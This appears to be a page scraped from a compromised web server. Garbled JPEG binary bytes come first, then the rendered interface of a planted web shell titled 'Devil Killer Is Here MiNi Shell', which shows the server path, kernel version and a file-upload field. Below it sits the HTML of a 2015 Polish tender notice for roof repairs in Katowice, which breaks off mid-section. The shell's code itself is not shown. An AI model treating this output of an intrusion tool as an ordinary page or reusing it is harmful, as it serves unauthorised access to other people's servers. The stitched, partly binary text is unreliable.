JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150803/197216-N-2015.html

<p class="kh_header"><b>Katowice: wybór wykonawcy robót budowlanych w zakresie kompleksowej wymiany pokrycia dachu z papy termozgrzewalnej, robót remontowych dachów z dachówki ceramicznej oraz świadczenia usług pogotowia dekarskiego</b><br>
<b>Numer ogłoszenia: 197216 - 2015; data zamieszczenia: 03.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Katowickie Towarzystwo Budownictwa Społecznego Sp. z o.o. , ul. Krasińskiego 14, 40-019 Katowice, woj. śląskie, tel. 32 2536713, 2537785, faks 32 2537128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs.katowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.tbs.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wybór wykonawcy robót budowlanych w zakresie kompleksowej wymiany pokrycia dachu z papy termozgrzewalnej, robót remontowych dachów z dachówki ceramicznej oraz świadczenia usług pogotowia dekarskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
dla części I zamówienia - kompleksowa wymiana pokrycia dachu budynku wielorodzinnego przy ul. St. Etienne 9 - 15a w Katowicach,
dla części II zamówienia - roboty remontowe dachów z dachówki ceramicznej 9 budynków mieszkalnych wielorodzinnych przy ul. Pod Kasztanami 41 - 83 w Katowicach, 
część III zamówienia - świadczenie usług pogotowia dekarskiego dla całego zasobu mieszkaniowego Katowickiego TBS Sp. z o.o. 
Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istotnych Warunków Zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium odrębnie dla każdej części zamówienia na którą wykonawca składa ofertę w wysokości:
część I zamówienia - kompleksowa wymiana pokrycia dachu budynku wielorodzinnego przy ul. Etienne 9 - 15a w Katowicach - 3 000,00 zł (słownie: trzy tysiące złotych).
część II zamówienia - roboty remontowe dachów z dachówki ceramicznej 9 budynków mieszkalnych wielorodzinnych przy ul. Pod Kasztanami 41 - 83 w Katowicach - 2 500,00 zł (słownie: dwa tysiące pięćset złotych).
część III zamówienia - świadczenie usług pogotowia dekarskiego dla całego zasobu mieszkaniowego Katowickiego TBS Sp. z o.o. - 2 500,00 zł (słownie: dwa tysiące pięćset złotych).
Wadium winno być wniesione wg zasad określonych w art. 45 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony w sytuacji złożenia przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku wykonawca jest zobowiązany wykazać, że posiada pozytywne i udokumentowane doświadczenie w realizacji robót budowlanych, tzn., że okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał dwa (2) zamówienia na roboty budowlane, w zakresie wykonywania pokryć dachowych porównywalnych z przedmiotem zamówienia o wartości każdego z zamówień co najmniej 100.000 zł brutto (słownie: sto tysięcy złotych brutto).
Na potwierdzenie spełniania warunku wykonawca do oferty złoży:
- oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 2 do SIWZ
- wykaz wykonanych robót budowlanych (zgodnie z załącznikiem nr 5 do SIWZ) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Do wykazania spełnienia warunku udziału w postępowaniu zamawiający wymaga wykazania co najmniej: 2 robót budowlanych spełniającej powyższy warunek, tj. 2 zamówień o wartości co najmniej 100 000 zł brutto każde z zamówień. Warunek będzie spełniony również jeżeli wykonawca potwierdzi wykonanie jednego zamówienia o wartości nie mniejszej niż 200.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony w sytuacji złożenia przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku wykonawca jest zobowiązany wykazać, że dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, posiadającymi uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lutego 1994 Prawo budowlane, z których co najmniej jedna osoba posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń wraz z aktualnym zaświadczeniem o przynależności do właściwej izby zawodowej oraz posiadającą co najmniej 5-letnie doświadczenie zawodowe w kierowaniu budową. 
Na potwierdzenie spełniania warunku wykonawca do oferty złoży:
- oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 2 do SIWZ
- wykaz osób, które będą uczestniczyć w realizacji zamówienia odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami na formularzu określonym w załączniku nr 6 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie na etapie postępowania przetargowego żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony w sytuacji złożenia przez wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 2 do SIWZ, 
- oświadczenia, że na dzień zawarcia umowy dokona ubezpieczenia od odpowiedzialności cywilnej na kwotę co najmniej 500.000,00 zł (słownie: pięćset tysięcy złotych) w zakresie prowadzonej przez Wykonawcę działalności związanej z przedmiotem zamówienia, według wzoru stanowiącego załącznik nr 7 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>wykonywanie pokryć dachowych porównywalnych z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - okres rękojmi i gwarancji - 15</li>
<li>3 - Wysokość kar umownych za każdy dzień przekroczenia terminu realizacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość ewentualnych zmian postanowień zawartej umowy (art.144 ust.1) w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy - w następujących sytuacjach: 
1.	wystąpienia siły wyższej,
2.	w przypadku wystąpienia odmiennych warunków geologicznych, terenowych, archeologicznych, wodnych itp. w tym w szczególności:
- odmienne od przyjętych w dokumentacji projektowej warunków geologicznych (kategorie gruntu, skał, itp.),
- odmienne od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie niezinwentaryzowanych podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
- niewypały i niewybuchy;
- wykopaliska archeologiczne,
3. w następstwie okoliczności leżących po stronie zamawiającego, w szczególności:
- wstrzymanie realizacji umowy przez zamawiającego;
- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub dokumentacji technicznej urządzeń,
- rezygnacja przez zamawiającego z realizacji części przedmiotu umowy, w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
4. W przypadku wystąpienia warunków atmosferycznych (mróz, temperatura, długotrwałe intensywne opady śniegu, deszczu) uniemożliwiających prowadzenie robót budowlanych, w tym przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
5. Zmiany będące następstwem działania organów administracji i organów kontroli, w szczególności:
- przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.;
- odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
- konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy,
- konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub
- zawodowych nie artykułowanych lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy
- inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące niemożliwością prowadzenia działań w celu wykonania umowy (realizacji zamówienia),
6. Zmniejszenie lub zwiększenie zakresu świadczenia i zakresu wynagrodzenia z powodu istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
7. Zmiany wskutek wystąpienia okoliczności, których zamawiający nie był w stanie przewidzieć, pomimo zachowania należytej staranności;
8. Wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienia ani na wynik postępowania o udzielenie zamówienia publicznego;
9. Zmiany dotyczące nazwy, siedziby wykonawcy lub zamawiającego, w tym ich formy organizacyjno - prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
10. Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy.
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (art.144 ust.1) w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy także w przypadkach wprowadzenia zmian technologicznych, w tym w szczególności:
1. niedostępności na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub technicznej bądź ofercie wykonawcy spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
2. konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych/ technologicznych niż wskazane w ofercie, dokumentacji projektowej lub technicznej w sytuacji, gdyby zastosowanie pierwotnie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia (dzieła),
3. konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Katowickie Towarzystwo Budownictwa Społecznego Sp. z o.o.
40-019 Katowice, ul. Krasińskiego 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2015 godzina 12:00, miejsce: Katowickie Towarzystwo Budownictwa Społecznego Sp. z o.o.
40-019 Katowice, ul. Krasińskiego 14
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kompleksowa wymiana pokrycia dachu budynku wielorodzinnego przy ul. St. Etienne 9 - 15a w Katowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek mieszkalny w Katowicach, przy ul. Saint Etienne 9 - 9a, 11 - 11a, 13 - 13a, 15 - 15a składa się z czterech segmentów dwu klatkowych.
Segmenty są symetryczne w następującym układzie:
Saint Etienne 9 - 9a i 15 - 15a - pow. dachów 397,80m2 *2 + nadbudówki o pow. 30,60m2 *2
Saint Etienne 11 - 11a i 13 - 13a - pow. dachów 448,80m2 *2 + nadbudówki o pow. 32,00m2 *2
W budynku występują na dachu wewnętrzne koryta odpływowe.   
Wykonanie remontu dachu wraz z robotami towarzyszącymi.
Złożona oferta musi uwzględniać wszystkie elementy przedmiotu zamówienia i obejmować następujący zakres robót:
